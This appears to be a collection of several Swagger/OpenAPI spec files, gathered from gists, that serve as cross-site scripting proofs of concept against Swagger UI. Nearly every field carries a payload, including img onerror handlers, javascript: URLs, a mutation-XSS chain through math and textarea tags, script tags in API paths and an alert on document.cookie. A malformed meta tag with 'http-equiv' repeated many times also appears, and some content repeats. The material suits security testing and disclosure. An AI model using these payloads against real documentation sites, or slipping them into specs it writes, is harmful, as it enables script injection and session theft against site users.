seba yak0n

## gist:b2f1feb172051d530e66238f19b32c2b
<html>
    <metahttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equivhttp-equ

## xss-5.yaml
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':

## swagger ui xss 4
{ "swagger": "2.0", "info": { "title": "/qqq'\"><b style='x: expression(alert(1))'>", "description": "/rrr'\"><b style='x: expression(alert(1))'>", "version": "2017-06-04T22:56:06+00:00", "contact": { "name": "/sss'\"></script><img src=x onerror=alert(document.domain)>", "url": "javascript:alert(document.domain)", "email": "x@c.se" } }, "host": "xok", "basePath": "/\"'>eee<img src=x onerror=alert(document.domain)>", "schemes": [ "https" ], "consumes": [ "/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>" ], "produces": [ "/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>" ], "securityDefinitions": { "oauth2": { "flow": "implicit", "authorizationUrl": "javascript:alert(document.domain)//", "scopes": { "web-api": "testing" }, "type": "oauth2" } }, "security": [ { "tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"] } ], "paths": { "/><img src=x onerror=alert(document.domain)>": { "post": { "summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)>

## gist:a4f3bcef6d5eb01c0c72a7d9f479cf28
swagger: "2.0"
info:
  title: test<img src=x onerror=prompt()>
  version: "1.1"
  description: description test<img src=x onerror=prompt()>
schemes: ["https"]
basePath: "/"

paths:
  /<script>alert(document.domain)</script>:

## swagger101-xss.json
{"apiVersion":"3","swaggerVersion":"1.1","basePath":"//","produces":["application\/json"],"consumes":["application\/json","multipart\/form-data"],"apis":[{"path":"\/<script>alert(document.cookie)</script>","description":"<s>123"}]}
	swagger: '2.0'
	info:
	title: Example yaml.spec
	description: \|
	<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
	paths:
	/accounts:
	get:
	responses:
	'200':
	swagger: "2.0"
	info:
	title: test<img src=x onerror=prompt()>
	version: "1.1"
	description: description test<img src=x onerror=prompt()>
	schemes: ["https"]
	basePath: "/"

	paths:
	/<script>alert(document.domain)</script>: